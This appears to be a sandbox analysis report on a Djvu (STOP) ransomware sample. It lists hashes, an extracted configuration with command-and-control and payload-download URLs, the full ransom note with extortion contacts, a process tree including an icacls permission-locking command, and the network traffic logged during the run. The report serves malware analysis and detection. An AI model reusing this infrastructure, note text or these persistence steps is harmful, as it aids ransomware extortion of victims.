Analysis

  • max time kernel
    149s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220901-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06/09/2022, 20:01 UTC

General

  • Target

    a571b2b859fd9733b05819f410957ea9e64393e1423ea971c1c7da329fb1797a.exe

  • Size

    777KB

  • MD5

    20f2afd8da63e9a7c46c6ac70abfe9bc

  • SHA1

    0a95131b75f6554950010efd7443b080495b5369

  • SHA256

    a571b2b859fd9733b05819f410957ea9e64393e1423ea971c1c7da329fb1797a

  • SHA512

    5f6caebdcefd378b320261e0750d157b4efd42b723dd0fc4fe13fb7987d1a1eed2721992ef717a380ff7dacb711a30f3f88ce4062ad9de10de7bd708c799eb28

  • SSDEEP

    24576:ouXXgnnnWiA41Kw9kYWHXle6+jhqFlc9vKFQ/fdtT:ouEbN1YnHX9+NqU3/fLT

Malware Config

Extracted

Family

djvu

C2

http://acacaca.org/test1/get.php

Attributes
  • extension

    .mmpu

  • offline_id

    yd6oYv6aBN90yFzTWdZ34sXSXtXiauzOLXZyWht1

  • payload_url

    http://rgyui.top/dl/build2.exe

    http://acacaca.org/files/1/build3.exe

  • ransomnote

    ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-xuPJqoyzQE Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@bestyourmail.ch Reserve e-mail address to contact us: datarestorehelp@airmail.cc Your personal ID: 0554Jhyjd

rsa_pubkey.plain
1
-----BEGIN PUBLIC KEY-----
2
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5Q7NsGDWoy0j1y22Tuhx
3
3HXIxllBNos5wjLKjPkRjRkDxBG+o8rUYbODa9/kVzgH9A30cJCext4kWYtmnkA3
4
T4c2t5Tg3UQvsY9HTUUfNTuK9HLb7kAHTH9RPfOV6qJqotUsM+TMZO1suH8L5RTQ
5
EynDLu2UpzP0HLusQ2B5QISprFQyu2L/LuFRES6gOQ0CJcJqCOen4rutxaHcxKyS
6
HoVDwjWL6LTuTaU3YeMrZRtm6AE26cLuOXBSrRd/XZIXVrQIXGjpRcwm1LUMxji1
7
tQY/UpD4qVEqsxAiFA/BOsbyUMwRH487AlT15nx5yUKQcxAJ0pEt8rpr2MSPicaq
8
+QIDAQAB
9
-----END PUBLIC KEY-----

Signatures

  • Detected Djvu ransomware 9 IoCs
  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Modifies file permissions 1 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a571b2b859fd9733b05819f410957ea9e64393e1423ea971c1c7da329fb1797a.exe
    "C:\Users\Admin\AppData\Local\Temp\a571b2b859fd9733b05819f410957ea9e64393e1423ea971c1c7da329fb1797a.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:3932
    • C:\Users\Admin\AppData\Local\Temp\a571b2b859fd9733b05819f410957ea9e64393e1423ea971c1c7da329fb1797a.exe
      "C:\Users\Admin\AppData\Local\Temp\a571b2b859fd9733b05819f410957ea9e64393e1423ea971c1c7da329fb1797a.exe"
      2⤵
      • Checks computer location settings
      • Adds Run key to start application
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2148
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Users\Admin\AppData\Local\9e4a3527-6bfd-4bdb-b910-49b1a73d0070" /deny *S-1-1-0:(OI)(CI)(DE,DC)
        3⤵
        • Modifies file permissions
        PID:3588
      • C:\Users\Admin\AppData\Local\Temp\a571b2b859fd9733b05819f410957ea9e64393e1423ea971c1c7da329fb1797a.exe
        "C:\Users\Admin\AppData\Local\Temp\a571b2b859fd9733b05819f410957ea9e64393e1423ea971c1c7da329fb1797a.exe" --Admin IsNotAutoStart IsNotTask
        3⤵
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:1496
        • C:\Users\Admin\AppData\Local\Temp\a571b2b859fd9733b05819f410957ea9e64393e1423ea971c1c7da329fb1797a.exe
          "C:\Users\Admin\AppData\Local\Temp\a571b2b859fd9733b05819f410957ea9e64393e1423ea971c1c7da329fb1797a.exe" --Admin IsNotAutoStart IsNotTask
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:4704

Network

  • flag-us
    DNS
    api.2ip.ua
    a571b2b859fd9733b05819f410957ea9e64393e1423ea971c1c7da329fb1797a.exe
    Remote address:
    8.8.8.8:53
    Request
    api.2ip.ua
    IN A
    Response
    api.2ip.ua
    IN A
    162.0.217.254
  • flag-nl
    GET
    https://api.2ip.ua/geo.json
    a571b2b859fd9733b05819f410957ea9e64393e1423ea971c1c7da329fb1797a.exe
    Remote address:
    162.0.217.254:443
    Request
    GET /geo.json HTTP/1.1
    User-Agent: Microsoft Internet Explorer
    Host: api.2ip.ua
    Response
    HTTP/1.1 429 Too Many Requests
    Date: Tue, 06 Sep 2022 20:03:03 GMT
    Server: Apache
    Strict-Transport-Security: max-age=63072000; preload
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block; report=...
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
    Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type
    Upgrade: h2,h2c
    Connection: Upgrade
    Transfer-Encoding: chunked
    Content-Type: text/html; charset=UTF-8
  • flag-nl
    GET
    https://api.2ip.ua/geo.json
    a571b2b859fd9733b05819f410957ea9e64393e1423ea971c1c7da329fb1797a.exe
    Remote address:
    162.0.217.254:443
    Request
    GET /geo.json HTTP/1.1
    User-Agent: Microsoft Internet Explorer
    Host: api.2ip.ua
    Response
    HTTP/1.1 429 Too Many Requests
    Date: Tue, 06 Sep 2022 20:04:16 GMT
    Server: Apache
    Strict-Transport-Security: max-age=63072000; preload
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block; report=...
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
    Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type
    Upgrade: h2,h2c
    Connection: Upgrade
    Transfer-Encoding: chunked
    Content-Type: text/html; charset=UTF-8
  • flag-us
    DNS
    rgyui.top
    a571b2b859fd9733b05819f410957ea9e64393e1423ea971c1c7da329fb1797a.exe
    Remote address:
    8.8.8.8:53
    Request
    rgyui.top
    IN A
    Response
    rgyui.top
    IN A
    210.182.29.70
    rgyui.top
    IN A
    138.36.3.134
    rgyui.top
    IN A
    41.41.255.235
    rgyui.top
    IN A
    222.232.238.243
    rgyui.top
    IN A
    109.98.58.98
    rgyui.top
    IN A
    109.102.255.230
    rgyui.top
    IN A
    175.126.109.15
    rgyui.top
    IN A
    1.248.122.240
    rgyui.top
    IN A
    211.119.84.112
    rgyui.top
    IN A
    196.200.111.5
  • flag-us
    DNS
    acacaca.org
    a571b2b859fd9733b05819f410957ea9e64393e1423ea971c1c7da329fb1797a.exe
    Remote address:
    8.8.8.8:53
    Request
    acacaca.org
    IN A
    Response
    acacaca.org
    IN A
    175.126.109.15
    acacaca.org
    IN A
    196.200.111.5
    acacaca.org
    IN A
    185.95.186.58
    acacaca.org
    IN A
    210.182.29.70
    acacaca.org
    IN A
    222.236.49.123
    acacaca.org
    IN A
    190.140.74.43
    acacaca.org
    IN A
    211.171.233.129
    acacaca.org
    IN A
    109.98.58.98
    acacaca.org
    IN A
    189.153.246.166
    acacaca.org
    IN A
    211.171.233.126
  • flag-kr
    GET
    http://rgyui.top/dl/build2.exe
    a571b2b859fd9733b05819f410957ea9e64393e1423ea971c1c7da329fb1797a.exe
    Remote address:
    210.182.29.70:80
    Request
    GET /dl/build2.exe HTTP/1.1
    User-Agent: Microsoft Internet Explorer
    Host: rgyui.top
    Response
    HTTP/1.1 200 OK
    Date: Tue, 06 Sep 2022 20:04:17 GMT
    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
    Last-Modified: Tue, 06 Sep 2022 10:20:50 GMT
    ETag: "5fe00-5e7ff8ce68f9f"
    Accept-Ranges: bytes
    Content-Length: 392704
    Connection: close
    Content-Type: application/octet-stream
  • flag-kr
    GET
    http://acacaca.org/test1/get.php?pid=0F5976590320BFFF06F8F7FB452CC041&first=true
    a571b2b859fd9733b05819f410957ea9e64393e1423ea971c1c7da329fb1797a.exe
    Remote address:
    175.126.109.15:80
    Request
    GET /test1/get.php?pid=0F5976590320BFFF06F8F7FB452CC041&first=true HTTP/1.1
    User-Agent: Microsoft Internet Explorer
    Host: acacaca.org
  • 8.253.183.120:80
    322 B
    7
  • 93.184.220.29:80
    322 B
    7
  • 20.42.73.25:443
    322 B
    7
  • 8.253.183.120:80
    322 B
    7
  • 8.253.183.120:80
    322 B
    7
  • 8.253.183.120:80
    322 B
    7
  • 162.0.217.254:443
    https://api.2ip.ua/geo.json
    tls, http
    a571b2b859fd9733b05819f410957ea9e64393e1423ea971c1c7da329fb1797a.exe
    1.0kB
    8.2kB
    14
    12

    HTTP Request

    GET https://api.2ip.ua/geo.json

    HTTP Response

    429
  • 162.0.217.254:443
    https://api.2ip.ua/geo.json
    tls, http
    a571b2b859fd9733b05819f410957ea9e64393e1423ea971c1c7da329fb1797a.exe
    970 B
    8.2kB
    13
    12

    HTTP Request

    GET https://api.2ip.ua/geo.json

    HTTP Response

    429
  • 210.182.29.70:80
    http://rgyui.top/dl/build2.exe
    http
    a571b2b859fd9733b05819f410957ea9e64393e1423ea971c1c7da329fb1797a.exe
    319 B
    2.9kB
    5
    4

    HTTP Request

    GET http://rgyui.top/dl/build2.exe

    HTTP Response

    200
  • 175.126.109.15:80
    http://acacaca.org/test1/get.php?pid=0F5976590320BFFF06F8F7FB452CC041&first=true
    http
    a571b2b859fd9733b05819f410957ea9e64393e1423ea971c1c7da329fb1797a.exe
    369 B
    132 B
    5
    3

    HTTP Request

    GET http://acacaca.org/test1/get.php?pid=0F5976590320BFFF06F8F7FB452CC041&first=true
  • 8.8.8.8:53
    api.2ip.ua
    dns
    a571b2b859fd9733b05819f410957ea9e64393e1423ea971c1c7da329fb1797a.exe
    56 B
    72 B
    1
    1

    DNS Request

    api.2ip.ua

    DNS Response

    162.0.217.254

  • 8.8.8.8:53
    rgyui.top
    dns
    a571b2b859fd9733b05819f410957ea9e64393e1423ea971c1c7da329fb1797a.exe
    55 B
    215 B
    1
    1

    DNS Request

    rgyui.top

    DNS Response

    210.182.29.70
    138.36.3.134
    41.41.255.235
    222.232.238.243
    109.98.58.98
    109.102.255.230
    175.126.109.15
    1.248.122.240
    211.119.84.112
    196.200.111.5

  • 8.8.8.8:53
    acacaca.org
    dns
    a571b2b859fd9733b05819f410957ea9e64393e1423ea971c1c7da329fb1797a.exe
    57 B
    217 B
    1
    1

    DNS Request

    acacaca.org

    DNS Response

    175.126.109.15
    196.200.111.5
    185.95.186.58
    210.182.29.70
    222.236.49.123
    190.140.74.43
    211.171.233.129
    109.98.58.98
    189.153.246.166
    211.171.233.126

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D

    Filesize

    2KB

    MD5

    9cd19ed49787d5bf969ac81a2dbf7ce9

    SHA1

    4ff7b3372f9778f210014bdd7989d6f9442caa37

    SHA256

    5e317a2565c34c5d13efedd5a58537a9f255df17457a567e5fcc061962475b22

    SHA512

    589a98c719b6f67e875cc05438d4801d8025e8661bc30d51351df864314f0f4e5f35aa27422954a43eddd9ca04903043b46a47335311586f709e8eeae87cf7b9

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

    Filesize

    1KB

    MD5

    7c27ffae0cbd6d55b86f387667635294

    SHA1

    6df10a537a970852086711da85ae84f7355bff72

    SHA256

    b6a9400010fea1af51104c2b48fdd4383d8b7a81bd62a22c188db3cdb7413503

    SHA512

    140752fd448ed5cd01c5463d67b7dd2c5c111fd4256d3686b792bc0ff788bed49fdfe901402fdb080b9a6c0789725dda6256280120fadc5aca1f127a552e13d6

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D

    Filesize

    488B

    MD5

    3b42d0c5ae1827fc0345b08a2941b727

    SHA1

    7c722355285918e5c67e9f6705ffcd922c5920fe

    SHA256

    a495a729047a31254e7869f10f963327a009e9905ddb1780a1746d6c8dae57d3

    SHA512

    7eab4c2641cc4996731ec6cf65454f790c192a5e46df9ea1c46cd223bbbf0dbea2412abe5e952208ab836c60b56f9b3df56b894b09f9585b8ba4a4054bea3511

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

    Filesize

    482B

    MD5

    6c9b64bc966dfe7725273ae6644572f9

    SHA1

    fce1f9c3e7f5a2b31f02d90c83f4ed8e8ceddbff

    SHA256

    e291a0be5aaf882589b8b763faaf449ac580369ca07f644d3273430b9a6d4daf

    SHA512

    174b2cc7636cc304dcbc708e809107c3a82d8e45b79cd1b6265627c466a77a647bc2c89e44474be10ddf0bb95842546942ce032b5fde72973bd6c33241c2d3f8

  • C:\Users\Admin\AppData\Local\9e4a3527-6bfd-4bdb-b910-49b1a73d0070\a571b2b859fd9733b05819f410957ea9e64393e1423ea971c1c7da329fb1797a.exe

    Filesize

    777KB

    MD5

    20f2afd8da63e9a7c46c6ac70abfe9bc

    SHA1

    0a95131b75f6554950010efd7443b080495b5369

    SHA256

    a571b2b859fd9733b05819f410957ea9e64393e1423ea971c1c7da329fb1797a

    SHA512

    5f6caebdcefd378b320261e0750d157b4efd42b723dd0fc4fe13fb7987d1a1eed2721992ef717a380ff7dacb711a30f3f88ce4062ad9de10de7bd708c799eb28

  • memory/1496-146-0x0000000002392000-0x0000000002423000-memory.dmp

    Filesize

    580KB

  • memory/2148-137-0x0000000000400000-0x0000000000537000-memory.dmp

    Filesize

    1.2MB

  • memory/2148-140-0x0000000000400000-0x0000000000537000-memory.dmp

    Filesize

    1.2MB

  • memory/2148-142-0x0000000000400000-0x0000000000537000-memory.dmp

    Filesize

    1.2MB

  • memory/2148-134-0x0000000000400000-0x0000000000537000-memory.dmp

    Filesize

    1.2MB

  • memory/2148-133-0x0000000000400000-0x0000000000537000-memory.dmp

    Filesize

    1.2MB

  • memory/3932-136-0x0000000000AD0000-0x0000000000BEB000-memory.dmp

    Filesize

    1.1MB

  • memory/3932-135-0x000000000260F000-0x00000000026A0000-memory.dmp

    Filesize

    580KB

  • memory/4704-145-0x0000000000400000-0x0000000000537000-memory.dmp

    Filesize

    1.2MB

  • memory/4704-147-0x0000000000400000-0x0000000000537000-memory.dmp

    Filesize

    1.2MB

  • memory/4704-153-0x0000000000400000-0x0000000000537000-memory.dmp

    Filesize

    1.2MB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.